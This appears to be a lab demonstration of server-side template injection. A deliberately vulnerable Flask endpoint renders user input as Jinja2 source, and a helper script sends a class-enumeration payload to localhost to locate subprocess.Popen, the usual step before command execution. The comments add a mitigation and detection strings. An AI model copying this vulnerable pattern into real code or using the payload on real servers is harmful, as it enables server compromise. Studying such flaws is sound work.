SSTI
FLASK WEB APP :
index.py
from flask import *
app = Flask(__name__)


@app.route('/')
def index():
    """Deliberately vulnerable lab endpoint: echo ``?search=`` through Jinja2.

    The query-string value is formatted into the template *source* before
    rendering, so any Jinja2 expression it contains is evaluated on the
    server (server-side template injection, SSTI). This is the intended
    flaw of the demo; the helper script on this page targets it on
    127.0.0.1 only.

    Mitigation: keep the template text constant and pass the value as
    render context instead, i.e. a fixed template containing
    ``{{ search }}`` rendered with
    ``render_template_string(fixed_template, search=search)``. The value is
    then treated as data, never as template code.
    """
    # Untrusted input: read straight from the query string, no filtering.
    # A missing or empty parameter ends up as None.
    query = request.args.get('search') or None

    # VULNERABLE: user input becomes part of the template source itself.
    page_source = '''
<p> SSTI KNOW </p>
{}
'''.format(query)

    # Debug trace for the lab; the raw request value is printed unmodified.
    print("[+] REQ : %s" % query)

    # VULNERABLE sink: Jinja2 compiles and evaluates the attacker-influenced
    # source built above.
    return render_template_string(page_source)
PAYLOAD :
A helper script I wrote myself to find the index of the right class:
import requests
import re
import html
# Lab helper for the intentionally vulnerable Flask app shown above.
# It talks to the loopback address only.
url = "http://127.0.0.1:8080/?search="

# Jinja2 expression that makes the vulnerable endpoint render the list of
# loaded subclasses of `object`.
# Detection: a request parameter containing `{{`, `__class__`, `__mro__` or
# `__subclasses__` is a strong SSTI-probing signal for web logs / WAF rules.
ssti_leak = "{{''.__class__.__mro__[1].__subclasses__()}}"

# NOTE(review): no timeout and no status-code check on this request.
response = requests.get(url + ssti_leak)

# Parse: decode HTML entities first so the `<class '...'>` reprs in the
# response body can be matched, then keep only the dotted class names.
class_names = re.findall(r"<class '(.*?)'>", html.unescape(response.text))

# Find Subprocess: position of the first exact match, or None when absent.
# The position depends on the interpreter build and on which modules the
# app has loaded, so it is looked up rather than hard-coded.
target_class = "subprocess.Popen"
try:
    index = class_names.index(target_class)
except ValueError:
    index = None

# With the endpoint fixed (value passed as render context), the response
# should only echo the expression text and this is expected to print
# "No bg".
if index is None:
    print(f"No bg")
else:
    print(f"[+] {target_class} at : {index}")